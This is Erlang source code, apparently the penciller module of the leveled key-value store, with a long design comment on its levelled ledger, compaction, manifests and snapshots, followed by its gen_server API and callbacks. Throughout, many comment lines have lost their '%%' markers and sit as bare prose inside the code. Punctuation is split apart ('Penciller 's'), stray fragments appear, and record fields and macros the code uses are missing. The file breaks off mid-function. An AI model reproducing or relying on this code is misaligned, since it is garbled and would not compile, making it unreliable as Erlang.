%% requested snapshots of the Ledger
%% - The accepts new dumps (in the form of a leveled_tree accomponied by
an array of hash - listing binaries ) from the Bookie , and responds either ' ok '
to the bookie if the information is accepted nad the Bookie can refresh its
%% memory, or 'returned' if the bookie must continue without refreshing as the
Penciller is not currently able to accept the update ( potentially due to a
%% backlog of compaction work)
- The Penciller 's persistence of the ledger may not be reliable , in that it
%% may lose data but only in sequence from a particular sequence number. On
startup the Penciller will inform the Bookie of the highest sequence number
it has , and the Bookie should load any missing data from that point out of
%% the journal.
%%
-------- LEDGER ---------
%%
%% The Ledger is divided into many levels
- L0 : New keys are received from the Bookie and and kept in the levelzero
cache , until that cache is the size of a SST file , and it is then persisted
as a SST file at this level . L0 SST files can be larger than the normal
%% maximum size - so we don't have to consider problems of either having more
than one L0 file ( and handling what happens on a crash between writing the
files when the second may have overlapping sequence numbers ) , or having a
%% remainder with overlapping in sequence numbers in memory after the file is
written . Once the persistence is completed , the L0 cache can be erased .
There can be only one SST file at Level 0 , so the work to merge that file
%% to the lower level must be the highest priority, as otherwise writes to the
%% ledger will stall, when there is next a need to persist.
- L1 TO L7 : May contain multiple processes managing non - overlapping SST
%% files. Compaction work should be sheduled if the number of files exceeds
the target size of the level , where the target size is 8 ^ n.
%%
The most recent revision of a Key can be found by checking each level until
%% the key is found. To check a level the correct file must be sought from the
%% manifest for that level, and then a call is made to that file. If the Key
%% is not present then every level should be checked.
%%
%% If a compaction change takes the size of a level beyond the target size,
%% then compaction work for that level + 1 should be added to the compaction
%% work queue.
Compaction work is fetched by the Penciller 's Clerk because :
%% - it has timed out due to a period of inactivity
%% - it has been triggered by the a cast to indicate the arrival of high
%% priority compaction work
The Penciller 's Clerk ( which performs compaction worker ) will always call
the Penciller to find out the highest priority work currently required
%% whenever it has either completed work, or a timeout has occurred since it
%% was informed there was no work to do.
%%
%% When the clerk picks work it will take the current manifest, and the
Penciller assumes the manifest sequence number is to be incremented .
%% When the clerk has completed the work it can request that the manifest
change be committed by the Penciller . The commit is made through changing
the filename of the new manifest - so the Penciller is not held up by the
process of wiritng a file , just altering file system metadata .
%%
%% ---------- PUSH ----------
%%
The Penciller must support the PUSH of a dump of keys from the Bookie . The
%% call to PUSH should be immediately acknowledged, and then work should be
completed to merge the cache update into the L0 cache .
%%
%% The Penciller MUST NOT accept a new PUSH if the Clerk has commenced the
conversion of the current L0 cache into a SST file , but not completed this
change . The Penciller in this case returns the push , and the Bookie should
%% continue to grow the cache before trying again.
%%
%% ---------- FETCH ----------
%%
On request to fetch a key the Penciller should look first in the in - memory
%% L0 tree, then look in the SST files Level by Level (including level 0),
%% consulting the Manifest to determine which file should be checked at each
%% level.
%%
---------- SNAPSHOT ----------
%%
%% Iterators may request a snapshot of the database. A snapshot is a cloned
Penciller seeded not from disk , but by the in - memory and the
in - memory manifest , allowing for direct reference for the SST file processes .
%%
Clones formed to support snapshots are registered by the Penciller , so that
SST files valid at the point of the snapshot until either the iterator is
%% completed or has timed out.
%%
%% ---------- ON STARTUP ----------
%%
On Startup the Bookie with ask the Penciller to initiate the Ledger first .
To initiate the Ledger the must consult the manifest , and then start a SST
%% management process for each file in the manifest.
%%
%% The penciller should then try and read any Level 0 file which has the
manifest sequence number one higher than the last store in the manifest .
%%
The Bookie will ask the Inker for any Keys seen beyond that sequence number
%% before the startup of the overall store can be completed.
%%
---------- ON SHUTDOWN ----------
%%
On a controlled shutdown the Penciller should attempt to write any in - memory
ETS table to a L0 SST file , assuming one is nto already pending . If one is
already pending then the Penciller will not persist this part of the Ledger .
%%
%% ---------- FOLDER STRUCTURE ----------
%%
The following folders are used by the Penciller
%% $ROOT/ledger/ledger_manifest/ - used for keeping manifest files
$ ROOT / ledger / ledger_files/ - containing individual SST files
%%
%% In larger stores there could be a large number of files in the ledger_file
%% folder - perhaps o(1000). It is assumed that modern file systems should
%% handle this efficiently.
%%
---------- COMPACTION & MANIFEST UPDATES ----------
%%
The Penciller can have one and only one Clerk for performing compaction
%% work. When the Clerk has requested and taken work, it should perform the
5 compaction work starting the new SST process to manage the new Ledger state
%% and then write a new manifest file that represents that state with using
%% the next Manifest sequence number as the filename:
%% - nonzero_<ManifestSQN#>.pnd
%%
%% The Penciller on accepting the change should rename the manifest file to -
%% - nonzero_<ManifestSQN#>.crr
%%
On startup , the Penciller should look for the file with the
%% highest such manifest sequence number. This will be started as the
%% manifest, together with any _0_0.sst file found at that Manifest SQN.
Level zero files are not kept in the persisted manifest , and adding a L0
%% file does not advanced the Manifest SQN.
%%
%% The pace at which the store can accept updates will be dependent on the
speed at which the Penciller 's Clerk can merge files at lower levels plus
%% the time it takes to merge from Level 0. As if a clerk has commenced
compaction work at a lower level and then immediately a L0 SST file is
written the Penciller will need to wait for this compaction work to
complete and the L0 file to be compacted before the ETS table can be
%% allowed to again reach capacity
%%
The writing of L0 files do not require the involvement of the clerk .
The L0 files are prompted directly by the penciller when the in - memory tree
%% has reached capacity. This places the penciller in a levelzero_pending
state , and in this state it must return new pushes . Once the SST file has
%% been completed it will confirm completion to the penciller which can then
%% revert the levelzero_pending state, add the file to the manifest and clear
the current level zero in - memory view .
%%
-module(leveled_penciller).
-behaviour(gen_server).
-include("include/leveled.hrl").
-export([
init/1,
handle_call/3,
handle_cast/2,
handle_info/2,
terminate/2,
code_change/3,
format_status/2]).
-export([
pcl_snapstart/1,
pcl_start/1,
pcl_pushmem/2,
pcl_fetchlevelzero/3,
pcl_fetch/4,
pcl_fetchkeys/5,
pcl_fetchkeys/6,
pcl_fetchkeysbysegment/8,
pcl_fetchnextkey/5,
pcl_checksequencenumber/3,
pcl_workforclerk/1,
pcl_manifestchange/2,
pcl_confirml0complete/5,
pcl_confirmdelete/3,
pcl_close/1,
pcl_doom/1,
pcl_releasesnapshot/2,
pcl_registersnapshot/5,
pcl_getstartupsequencenumber/1,
pcl_checkbloomtest/2,
pcl_checkforwork/1,
pcl_persistedsqn/1,
pcl_loglevel/2,
pcl_addlogs/2,
pcl_removelogs/2]).
-export([
sst_rootpath/1,
sst_filename/3]).
-export([
clean_testdir/1]).
-include_lib("eunit/include/eunit.hrl").
-define(MAX_WORK_WAIT, 300).
-define(MANIFEST_FP, "ledger_manifest").
-define(FILES_FP, "ledger_files").
-define(CURRENT_FILEX, "crr").
-define(PENDING_FILEX, "pnd").
-define(SST_FILEX, ".sst").
-define(ARCHIVE_FILEX, ".bak").
-define(SUPER_MAX_TABLE_SIZE, 40000).
-define(PROMPT_WAIT_ONL0, 5).
-define(WORKQUEUE_BACKLOG_TOLERANCE, 4).
-define(COIN_SIDECOUNT, 4).
Log a very slow fetch - longer than 500ms
-define(ITERATOR_SCANWIDTH, 4).
-define(TIMING_SAMPLECOUNTDOWN, 10000).
-define(TIMING_SAMPLESIZE, 100).
-define(OPEN_LASTMOD_RANGE, {0, infinity}).
-record(state, {manifest ::
leveled_pmanifest:manifest() | undefined | redacted,
query_manifest ::
{list(),
leveled_codec:ledger_key(),
leveled_codec:ledger_key()} | undefined,
% Slimmed down version of the manifest containing part
related to specific query , and the StartKey / EndKey
% used to extract this part
The highest SQN persisted
The highest SQN added to L0
levelzero_pending = false :: boolean(),
levelzero_constructor :: pid() | undefined,
levelzero_cache = [] :: levelzero_cache() | redacted,
levelzero_size = 0 :: integer(),
levelzero_maxcachesize :: integer() | undefined,
levelzero_cointoss = false :: boolean(),
levelzero_index ::
leveled_pmem:index_array() | undefined | redacted,
levelzero_astree :: list() | undefined | redacted,
root_path = "test" :: string(),
clerk :: pid() | undefined,
is_snapshot = false :: boolean(),
snapshot_fully_loaded = false :: boolean(),
snapshot_time :: pos_integer() | undefined,
source_penciller :: pid() | undefined,
bookie_monref :: reference() | undefined,
work_ongoing = false :: boolean(), % i.e. compaction work
work_backlog = false :: boolean(), % i.e. compaction work
pending_removals = [] :: list(string()),
maybe_release = false :: boolean(),
snaptimeout_short :: pos_integer()|undefined,
snaptimeout_long :: pos_integer()|undefined,
monitor = {no_monitor, 0} :: leveled_monitor:monitor(),
sst_options = #sst_options{} :: sst_options()}).
-type penciller_options() :: #penciller_options{}.
-type bookies_memory() :: {tuple()|empty_cache,
array:array()|empty_array,
integer()|infinity,
integer()}.
-type pcl_state() :: #state{}.
-type levelzero_cacheentry() :: {pos_integer(), leveled_tree:leveled_tree()}.
-type levelzero_cache() :: list(levelzero_cacheentry()).
-type iterator_entry()
:: {pos_integer(),
list(leveled_codec:ledger_kv()|leveled_sst:expandable_pointer())}.
-type iterator() :: list(iterator_entry()).
-type bad_ledgerkey() :: list().
-type sqn_check() :: current|replaced|missing.
-type sst_fetchfun() ::
fun((pid(),
leveled_codec:ledger_key(),
leveled_codec:segment_hash(),
non_neg_integer()) ->
leveled_codec:ledger_kv()|not_present).
-type levelzero_returnfun() :: fun((levelzero_cacheentry()) -> ok).
-type pclacc_fun() ::
fun((leveled_codec:ledger_key(),
leveled_codec:ledger_value(),
any()) -> any()).
-type sst_options() :: #sst_options{}.
-export_type([levelzero_cacheentry/0, levelzero_returnfun/0, sqn_check/0]).
%%%============================================================================
%%% API
%%%============================================================================
-spec pcl_start(penciller_options()) -> {ok, pid()}.
%% @doc
%% Start a penciller using a penciller options record. The start_snapshot
%% option should be used if this is to be a clone of an existing penciller,
%% otherwise the penciller will look in root path for a manifest and
associated sst files to start - up from a previous persisted state .
%%
%% When starting a clone a query can also be passed. This prevents the whole
%% Level Zero memory space from being copied to the snapshot, instead the
query is run against the level zero space and just the query results are
%% copied into the clone.
pcl_start(PCLopts) ->
gen_server:start_link(?MODULE, [leveled_log:get_opts(), PCLopts], []).
-spec pcl_snapstart(penciller_options()) -> {ok, pid()}.
%% @doc
%% Don't link to the bookie - this is a snpashot
pcl_snapstart(PCLopts) ->
gen_server:start(?MODULE, [leveled_log:get_opts(), PCLopts], []).
-spec pcl_pushmem(pid(), bookies_memory()) -> ok|returned.
%% @doc
Load the contents of the Bookie 's memory of recent additions to the Ledger
to the Ledger proper .
%%
%% The load is made up of a cache in the form of a leveled_skiplist tuple (or
%% the atom empty_cache if no cache is present), an index of entries in the
%% skiplist in the form of leveled_pmem index (or empty_index), the minimum
%% sequence number in the cache and the maximum sequence number.
%%
%% If the penciller does not have capacity for the pushed cache it will
%% respond with the atom 'returned'. This is a signal to hold the memory
at the Bookie , and try again soon . This normally only occurs when there
%% is a backlog of merges - so the bookie should backoff for longer each time.
pcl_pushmem(Pid, LedgerCache) ->
Bookie to dump memory onto penciller
gen_server:call(Pid, {push_mem, LedgerCache}, infinity).
-spec pcl_fetchlevelzero(pid(),
non_neg_integer(),
fun((levelzero_cacheentry()) -> ok))
-> ok.
%% @doc
Allows a single slot of the penciller 's levelzero cache to be fetched . The
levelzero cache can be up to 40 K keys - sending this to the process that is
persisting this in a SST file in a single cast will lock the process for
%% 30-40ms. This allows that process to fetch this slot by slot, so that
%% this is split into a series of smaller events.
%%
%% The return value will be a leveled_skiplist that forms that part of the
%% cache
pcl_fetchlevelzero(Pid, Slot, ReturnFun) ->
Timeout to cause crash of L0 file when it ca n't get the close signal
% as it is deadlocked making this call.
%
If the timeout gets hit outside of close scenario the Penciller will
be stuck in L0 pending
gen_server:cast(Pid, {fetch_levelzero, Slot, ReturnFun}).
-spec pcl_fetch(pid(), leveled_codec:ledger_key())
-> leveled_codec:ledger_kv()|not_present.
%% @doc
Fetch a key , return the first ( highest SQN ) occurrence of that Key along
%% with the value.
%%
%% The Key needs to be hashable (i.e. have a tag which indicates that the key
%% can be looked up) - index entries are not hashable for example.
%%
%% If the hash is already known, call pcl_fetch/3 as segment_hash is a
%% relatively expensive hash function
pcl_fetch(Pid, Key) ->
Hash = leveled_codec:segment_hash(Key),
if
Hash /= no_lookup ->
gen_server:call(Pid, {fetch, Key, Hash, true}, infinity)
end.
-spec pcl_fetch(pid(),
leveled_codec:ledger_key(),
leveled_codec:segment_hash(),
boolean()) -> leveled_codec:ledger_kv()|not_present.
%% @doc
Fetch a key , return the first ( highest SQN ) occurrence of that Key along
%% with the value.
%%
%% Hash should be result of leveled_codec:segment_hash(Key)
pcl_fetch(Pid, Key, Hash, UseL0Index) ->
gen_server:call(Pid, {fetch, Key, Hash, UseL0Index}, infinity).
-spec pcl_fetchkeys(pid(),
leveled_codec:ledger_key(),
leveled_codec:ledger_key(),
pclacc_fun(), any(), as_pcl|by_runner) -> any().
%% @doc
Run a range query between StartKey and ( inclusive ) . This will cover
%% all keys in the range - so must only be run against snapshots of the
%% penciller to avoid blocking behaviour.
%%
Comparison with the upper - end of the range ( EndKey ) is done using
%% leveled_codec:endkey_passed/2 - so use nulls within the tuple to manage
the top of the range . Comparison with the start of the range is based on
Erlang term order .
pcl_fetchkeys(Pid, StartKey, EndKey, AccFun, InitAcc) ->
pcl_fetchkeys(Pid, StartKey, EndKey, AccFun, InitAcc, as_pcl).
pcl_fetchkeys(Pid, StartKey, EndKey, AccFun, InitAcc, By) ->
gen_server:call(Pid,
{fetch_keys,
StartKey, EndKey,
AccFun, InitAcc,
false, false, -1,
By},
infinity).
-spec pcl_fetchkeysbysegment(pid(),
leveled_codec:ledger_key(),
leveled_codec:ledger_key(),
pclacc_fun(), any(),
leveled_codec:segment_list(),
false | leveled_codec:lastmod_range(),
boolean()) -> any().
%% @doc
Run a range query between StartKey and ( inclusive ) . This will cover
%% all keys in the range - so must only be run against snapshots of the
%% penciller to avoid blocking behaviour.
%%
This version allows an additional input of a SegmentList . This is a list
of 16 - bit integers representing the segment IDs band ( ( 2 ^ 16 ) -1 ) that
%% are interesting to the fetch
%%
%% Note that segment must be false unless the object Tag supports additional
%% indexing by segment. This cannot be used on ?IDX_TAG and other tags that
use the no_lookup hash
pcl_fetchkeysbysegment(Pid, StartKey, EndKey, AccFun, InitAcc,
SegmentList, LastModRange, LimitByCount) ->
{MaxKeys, InitAcc0} =
case LimitByCount of
true ->
% The passed in accumulator should have the Max Key Count
as the first element of a tuple with the actual accumulator
InitAcc;
false ->
{-1, InitAcc}
end,
gen_server:call(Pid,
{fetch_keys,
StartKey, EndKey, AccFun, InitAcc0,
SegmentList, LastModRange, MaxKeys,
by_runner},
infinity).
-spec pcl_fetchnextkey(pid(),
leveled_codec:ledger_key(),
leveled_codec:ledger_key(),
pclacc_fun(), any()) -> any().
%% @doc
Run a range query between StartKey and ( inclusive ) . This has the
same constraints as pcl_fetchkeys/5 , but will only return the first key
found in erlang term order .
pcl_fetchnextkey(Pid, StartKey, EndKey, AccFun, InitAcc) ->
gen_server:call(Pid,
{fetch_keys,
StartKey, EndKey,
AccFun, InitAcc,
false, false, 1,
as_pcl},
infinity).
-spec pcl_checksequencenumber(pid(),
leveled_codec:ledger_key()|bad_ledgerkey(),
integer()) -> sqn_check().
%% @doc
%% Check if the sequence number of the passed key is not replaced by a change
%% after the passed sequence number. Will return:
%% - current
%% - replaced
%% - missing
pcl_checksequencenumber(Pid, Key, SQN) ->
Hash = leveled_codec:segment_hash(Key),
if
Hash /= no_lookup ->
gen_server:call(Pid, {check_sqn, Key, Hash, SQN}, infinity)
end.
-spec pcl_workforclerk(pid()) -> ok.
%% @doc
%% A request from the clerk to check for work. If work is present the
Penciller will cast back to the clerk , no response is sent to this
%% request.
pcl_workforclerk(Pid) ->
gen_server:cast(Pid, work_for_clerk).
-spec pcl_manifestchange(pid(), leveled_pmanifest:manifest()) -> ok.
%% @doc
%% Provide a manifest record (i.e. the output of the leveled_pmanifest module)
%% that is required to beocme the new manifest.
pcl_manifestchange(Pid, Manifest) ->
gen_server:cast(Pid, {manifest_change, Manifest}).
-spec pcl_confirml0complete(pid(),
string(),
leveled_codec:ledger_key(),
leveled_codec:ledger_key(),
binary()) -> ok.
%% @doc
Allows a SST writer that has written a L0 file to confirm that the file
%% is now complete, so the filename and key ranges can be added to the
manifest and the file can be used in place of the in - memory levelzero
%% cache.
pcl_confirml0complete(Pid, FN, StartKey, EndKey, Bloom) ->
gen_server:cast(Pid, {levelzero_complete, FN, StartKey, EndKey, Bloom}).
-spec pcl_confirmdelete(pid(), string(), pid()) -> ok.
%% @doc
%% Poll from a delete_pending file requesting a message if the file is now
%% ready for deletion (i.e. all snapshots which depend on the file have
%% finished)
pcl_confirmdelete(Pid, FileName, FilePid) ->
gen_server:cast(Pid, {confirm_delete, FileName, FilePid}).
-spec pcl_getstartupsequencenumber(pid()) -> integer().
%% @doc
%% At startup the penciller will get the largest sequence number that is
%% within the persisted files. This function allows for this sequence number
%% to be fetched - so that it can be used to determine parts of the Ledger
%% which may have been lost in the last shutdown (so that the ledger can
be reloaded from that point in the Journal )
pcl_getstartupsequencenumber(Pid) ->
gen_server:call(Pid, get_startup_sqn, infinity).
-spec pcl_registersnapshot(pid(),
pid(),
no_lookup|{tuple(), tuple()}|undefined,
bookies_memory(),
boolean())
-> {ok, pcl_state()}.
%% @doc
%% Register a snapshot of the penciller, returning a state record from the
penciller for the snapshot to use as its LoopData
pcl_registersnapshot(Pid, Snapshot, Query, BookiesMem, LR) ->
gen_server:call(Pid,
{register_snapshot, Snapshot, Query, BookiesMem, LR},
infinity).
-spec pcl_releasesnapshot(pid(), pid()) -> ok.
%% @doc
%% Inform the primary penciller that a snapshot is finished, so that the
%% penciller can allow deletes to proceed if appropriate.
pcl_releasesnapshot(Pid, Snapshot) ->
gen_server:cast(Pid, {release_snapshot, Snapshot}).
-spec pcl_persistedsqn(pid()) -> integer().
%% @doc
Return the persisted SQN , the highest SQN which has been persisted into the
%% Ledger
pcl_persistedsqn(Pid) ->
gen_server:call(Pid, persisted_sqn, infinity).
-spec pcl_close(pid()) -> ok.
%% @doc
%% Close the penciller neatly, trying to persist to disk anything in the memory
pcl_close(Pid) ->
gen_server:call(Pid, close, 60000).
-spec pcl_doom(pid()) -> {ok, list()}.
%% @doc
%% Close the penciller neatly, trying to persist to disk anything in the memory
Return a list of from where files exist for this penciller ( should
%% the calling process which to erase the store).
pcl_doom(Pid) ->
gen_server:call(Pid, doom, 60000).
-spec pcl_checkbloomtest(pid(), tuple()) -> boolean().
%% @doc
%% Function specifically added to help testing. In particular to make sure
%% that blooms are still available after pencllers have been re-loaded from
%% disk.
pcl_checkbloomtest(Pid, Key) ->
Hash = leveled_codec:segment_hash(Key),
if
Hash /= no_lookup ->
gen_server:call(Pid, {checkbloom_fortest, Key, Hash}, 2000)
end.
-spec pcl_checkforwork(pid()) -> boolean().
%% @doc
%% Used in test only to confim compaction work complete before closing
pcl_checkforwork(Pid) ->
gen_server:call(Pid, check_for_work, 2000).
-spec pcl_loglevel(pid(), leveled_log:log_level()) -> ok.
%% @doc
Change the log level of the Journal
pcl_loglevel(Pid, LogLevel) ->
gen_server:cast(Pid, {log_level, LogLevel}).
-spec pcl_addlogs(pid(), list(string())) -> ok.
%% @doc
%% Add to the list of forced logs, a list of more forced logs
pcl_addlogs(Pid, ForcedLogs) ->
gen_server:cast(Pid, {add_logs, ForcedLogs}).
-spec pcl_removelogs(pid(), list(string())) -> ok.
%% @doc
%% Remove from the list of forced logs, a list of forced logs
pcl_removelogs(Pid, ForcedLogs) ->
gen_server:cast(Pid, {remove_logs, ForcedLogs}).
%%%============================================================================
%%% gen_server callbacks
%%%============================================================================
init([LogOpts, PCLopts]) ->
leveled_log:save(LogOpts),
leveled_rand:seed(),
case {PCLopts#penciller_options.root_path,
PCLopts#penciller_options.start_snapshot,
PCLopts#penciller_options.snapshot_query,
PCLopts#penciller_options.bookies_mem} of
{undefined, _Snapshot=true, Query, BookiesMem} ->
SrcPenciller = PCLopts#penciller_options.source_penciller,
LongRunning = PCLopts#penciller_options.snapshot_longrunning,
%% monitor the bookie, and close the snapshot when bookie
%% exits
BookieMonitor =
erlang:monitor(process, PCLopts#penciller_options.bookies_pid),
{ok, State} = pcl_registersnapshot(SrcPenciller,
self(),
Query,
BookiesMem,
LongRunning),
leveled_log:log(p0001, [self()]),
{ok, State#state{is_snapshot = true,
bookie_monref = BookieMonitor,
source_penciller = SrcPenciller}};
{_RootPath, _Snapshot=false, _Q, _BM} ->
start_from_file(PCLopts)
end.
handle_call({push_mem, {LedgerTable, PushedIdx, MinSQN, MaxSQN}},
_From,
State=#state{is_snapshot=Snap}) when Snap == false ->
% The push_mem process is as follows:
%
1 . If either the penciller is still waiting on the last L0 file to be
% written, or there is a work backlog - the cache is returned with the
% expectation that PUTs should be slowed. Also if the cache has reached
the maximum number of lines ( by default after 31 pushes from the bookie )
%
2 . If ( 1 ) does not apply , the bookie 's cache will be added to the
% penciller's cache.
SW = os:timestamp(),
L0Pending = State#state.levelzero_pending,
WorkBacklog = State#state.work_backlog,
CacheAlreadyFull = leveled_pmem:cache_full(State#state.levelzero_cache),
L0Size = State#state.levelzero_size,
The clerk is prompted into action as there may be a L0 write required
ok = leveled_pclerk:clerk_prompt(State#state.clerk),
case L0Pending or WorkBacklog or CacheAlreadyFull of
true ->
% Cannot update the cache, or roll the memory so reply `returned`
The Bookie must now retain the lesger cache and try to push the
% updated cache at a later time
leveled_log:log(
p0018,
[L0Size, L0Pending, WorkBacklog, CacheAlreadyFull]),
{reply, returned, State};
false ->
Return ok as cache has been updated on State and the Bookie
should clear its ledger cache which is now with the Penciller
PushedTree =
case is_tuple(LedgerTable) of
true ->
LedgerTable;
false ->
leveled_tree:from_orderedset(LedgerTable, ?CACHE_TYPE)
end,
case leveled_pmem:add_to_cache(
L0Size,
{PushedTree, MinSQN, MaxSQN},
State#state.ledger_sqn,
State#state.levelzero_cache,
true) of
empty_push ->
{reply, ok, State};
{UpdMaxSQN, NewL0Size, UpdL0Cache} ->
UpdL0Index =
leveled_pmem:add_to_index(
PushedIdx,
State#state.levelzero_index,
length(State#state.levelzero_cache) + 1),
leveled_log:log_randomtimer(
p0031,
[NewL0Size, true, true, MinSQN, MaxSQN], SW, 0.1),
{reply,
ok,
State#state{
levelzero_cache = UpdL0Cache,
levelzero_size = NewL0Size,
levelzero_index = UpdL0Index,
ledger_sqn = UpdMaxSQN}}
end
end;
handle_call({fetch, Key, Hash, UseL0Index}, _From, State) ->
L0Idx =
case UseL0Index of
true ->
State#state.levelzero_index;
false ->
none
end,
R =
timed_fetch_mem(
Key, Hash, State#state.manifest,
State#state.levelzero_cache, L0Idx,
State#state.monitor),
{reply, R, State};
handle_call({check_sqn, Key, Hash, SQN}, _From, State) ->
{reply,
compare_to_sqn(
fetch_sqn(
Key,
Hash,
State#state.manifest,
State#state.levelzero_cache,
State#state.levelzero_index),
SQN),
State};
handle_call({fetch_keys,
StartKey, EndKey,
AccFun, InitAcc,
SegmentList, LastModRange, MaxKeys, By},
_From,
State=#state{snapshot_fully_loaded=Ready})
when Ready == true ->
LastModRange0 =
case LastModRange of
false ->
?OPEN_LASTMOD_RANGE;
R ->
R
end,
SW = os:timestamp(),
L0AsList =
case State#state.levelzero_astree of
undefined ->
leveled_pmem:merge_trees(StartKey,
EndKey,
State#state.levelzero_cache,
leveled_tree:empty(?CACHE_TYPE));
List ->
List
end,
FilteredL0 =
case SegmentList of
false ->
L0AsList;
_ ->
TunedList = leveled_sst:tune_seglist(SegmentList),
FilterFun =
fun(LKV) ->
CheckSeg =
leveled_sst:extract_hash(
leveled_codec:strip_to_segmentonly(LKV)),
leveled_sst:member_check(CheckSeg, TunedList)
end,
lists:filter(FilterFun, L0AsList)
end,
leveled_log:log_randomtimer(
p0037, [State#state.levelzero_size], SW, 0.01),
%% Rename any reference to loop state that may be used by the function
%% to be returned -
SSTiter =
case State#state.query_manifest of
undefined ->
leveled_pmanifest:query_manifest(
State#state.manifest, StartKey, EndKey);
{QueryManifest, StartKeyQM, EndKeyQM}
when StartKey >= StartKeyQM, EndKey =< EndKeyQM ->
QueryManifest
end,
SnapshotTime = State#state.snapshot_time,
Folder =
fun() ->
keyfolder({FilteredL0, SSTiter},
{StartKey, EndKey},
{AccFun, InitAcc, SnapshotTime},
{SegmentList, LastModRange0, MaxKeys})
end,
case By of
as_pcl ->
{reply, Folder(), State};
by_runner ->
{reply, Folder, State}
end;
handle_call(get_startup_sqn, _From, State) ->
{reply, State#state.persisted_sqn, State};
handle_call({register_snapshot, Snapshot, Query, BookiesMem, LongRunning},
_From, State) ->
% Register and load a snapshot
%
% For setup of the snapshot to be efficient should pass a query
of ( StartKey , ) - this will avoid a fully copy of the penciller 's
% memory being required to be trasnferred to the clone. However, this
% will not be a valid clone for fetch
TimeO =
case LongRunning of
true ->
State#state.snaptimeout_long;
false ->
State#state.snaptimeout_short
end,
Manifest0 =
leveled_pmanifest:add_snapshot(State#state.manifest, Snapshot, TimeO),
{BookieIncrTree, BookieIdx, MinSQN, MaxSQN} = BookiesMem,
LM1Cache =
case BookieIncrTree of
empty_cache ->
leveled_tree:empty(?CACHE_TYPE);
_ ->
BookieIncrTree
end,
{CloneState, ManifestClone, QueryManifest} =
case Query of
no_lookup ->
{UpdMaxSQN, UpdSize, L0Cache} =
leveled_pmem:add_to_cache(
State#state.levelzero_size,
{LM1Cache, MinSQN, MaxSQN},
State#state.ledger_sqn,
State#state.levelzero_cache,
false),
{#state{levelzero_cache = L0Cache,
ledger_sqn = UpdMaxSQN,
levelzero_size = UpdSize,
persisted_sqn = State#state.persisted_sqn},
leveled_pmanifest:copy_manifest(State#state.manifest),
undefined};
{StartKey, EndKey} ->
SW = os:timestamp(),
L0AsTree =
leveled_pmem:merge_trees(StartKey,
EndKey,
State#state.levelzero_cache,
LM1Cache),
leveled_log:log_randomtimer(
p0037, [State#state.levelzero_size], SW, 0.01),
{#state{levelzero_astree = L0AsTree,
ledger_sqn = MaxSQN,
persisted_sqn = State#state.persisted_sqn},
undefined,
{leveled_pmanifest:query_manifest(
State#state.manifest, StartKey, EndKey),
StartKey,
EndKey}};
undefined ->
{UpdMaxSQN, UpdSize, L0Cache} =
leveled_pmem:add_to_cache(
State#state.levelzero_size,
{LM1Cache, MinSQN, MaxSQN},
State#state.ledger_sqn,
State#state.levelzero_cache,
false),
LM1Idx =
case BookieIdx of
empty_index ->
leveled_pmem:new_index();
_ ->
BookieIdx
end,
L0Index =
leveled_pmem:add_to_index(
LM1Idx, State#state.levelzero_index, length(L0Cache)),
{#state{levelzero_cache = L0Cache,
levelzero_index = L0Index,
levelzero_size = UpdSize,
ledger_sqn = UpdMaxSQN,
persisted_sqn = State#state.persisted_sqn},
leveled_pmanifest:copy_manifest(State#state.manifest),
undefined}
end,
{reply,
{ok,
CloneState#state{snapshot_fully_loaded = true,
snapshot_time = leveled_util:integer_now(),
manifest = ManifestClone,
query_manifest = QueryManifest}},
State#state{manifest = Manifest0}};
handle_call(close, _From, State=#state{is_snapshot=Snap}) when Snap == true ->
ok = pcl_releasesnapshot(State#state.source_penciller, self()),
{stop, normal, ok, State};
handle_call(close, _From, State) ->
Level 0 files lie outside of the manifest , and so if there is no L0
% file present it is safe to write the current contents of memory. If
there is a L0 file present - then the memory can be dropped ( it is
% recoverable from the ledger, and there should not be a lot to recover
% as presumably the ETS file has been recently flushed, hence the presence
of a L0 file ) .
%
% The penciller should close each file in the manifest, and call a close
% on the clerk.
ok = leveled_pclerk:clerk_close(State#state.clerk),
leveled_log:log(p0008, [close]),
L0Left = State#state.levelzero_size > 0,
case (not State#state.levelzero_pending and L0Left) of
true ->
Man0 = State#state.manifest,
{Constructor, _} =
roll_memory(
leveled_pmanifest:get_manifest_sqn(Man0) + 1,
State#state.ledger_sqn,
State#state.root_path,
State#state.levelzero_cache,
length(State#state.levelzero_cache),
State#state.sst_options,
true),
ok = leveled_sst:sst_close(Constructor);
false ->
leveled_log:log(p0010, [State#state.levelzero_size])
end,
shutdown_manifest(State#state.manifest, State#state.levelzero_constructor),
{stop, normal, ok, State};
handle_call(doom, _From, State) ->
leveled_log:log(p0030, []),
ok = leveled_pclerk:clerk_close(State#state.clerk),
shutdown_manifest(State#state.manifest, State#state.levelzero_constructor),
ManifestFP = State#state.root_path ++ "/" ++ ?MANIFEST_FP ++ "/",
FilesFP = State#state.root_path ++ "/" ++ ?FILES_FP ++ "/",
{stop, normal, {ok, [ManifestFP, FilesFP]}, State};
handle_call({checkbloom_fortest, Key, Hash}, _From, State) ->
Manifest = State#state.manifest,
FoldFun =
fun(Level, Acc) ->
case Acc of
true ->
true;
false ->
case leveled_pmanifest:key_lookup(Manifest, Level, Key) of
false ->
false;
FP ->
leveled_pmanifest:check_bloom(Manifest, FP, Hash)
end
end
end,
{reply, lists:foldl(FoldFun, false, lists:seq(0, ?MAX_LEVELS)), State};
handle_call(check_for_work, _From, State) ->
{_WL, WC} = leveled_pmanifest:check_for_work(State#state.manifest),
{reply, WC > 0, State};
handle_call(persisted_sqn, _From, State) ->
{reply, State#state.persisted_sqn, State}.
handle_cast({manifest_change, Manifest}, State) ->
NewManSQN = leveled_pmanifest:get_manifest_sqn(Manifest),
OldManSQN = leveled_pmanifest:get_manifest_sqn(State#state.manifest),
leveled_log:log(p0041, [OldManSQN, NewManSQN]),
Only safe to update the manifest if the SQN increments
if NewManSQN > OldManSQN ->
ok =
leveled_pclerk:clerk_promptdeletions(State#state.clerk, NewManSQN),
% This is accepted as the new manifest, files may be deleted
UpdManifest0 =
leveled_pmanifest:merge_snapshot(State#state.manifest, Manifest),
% Need to preserve the penciller's view of snapshots stored in
% the manifest
UpdManifest1 =
leveled_pmanifest:clear_pending(
UpdManifest0,
lists:usort(State#state.pending_removals),
State#state.maybe_release),
{noreply,
State#state{
manifest=UpdManifest1,
pending_removals = [],
maybe_release = false,
work_ongoing=false}}
end;
handle_cast({release_snapshot, Snapshot}, State) ->
Manifest0 = leveled_pmanifest:release_snapshot(State#state.manifest,
Snapshot),
leveled_log:log(p0003, [Snapshot]),
{noreply, State#state{manifest=Manifest0}};
handle_cast({confirm_delete, PDFN, FilePid}, State=#state{is_snapshot=Snap})
when Snap == false ->
This is a two stage process . A file that is ready for deletion can be
